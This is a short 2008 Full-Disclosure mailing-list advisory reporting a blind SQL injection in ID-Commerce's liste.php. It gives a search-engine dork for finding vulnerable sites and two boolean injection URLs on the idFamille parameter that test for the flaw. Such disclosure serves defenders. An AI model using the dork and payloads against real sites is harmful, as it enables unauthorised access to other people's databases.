[Full-disclosure] (( PoC)) ID-Commerce Security Advisory - SLR-2007-001 (( PoC))
consultant gmail
consultant.securite at gmail.com
Thu Jan 10 13:22:29 GMT 2008
Blind SQL injection :
check : inurl:'liste.php?idFamille='
http://URL/liste.php?idFamille=1%20or%201=1#
http://URL/liste.php?idFamille=1%20or%201=0#
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080110/675eb053/attachment.html
Full-Disclosure is hosted and sponsored by Secunia.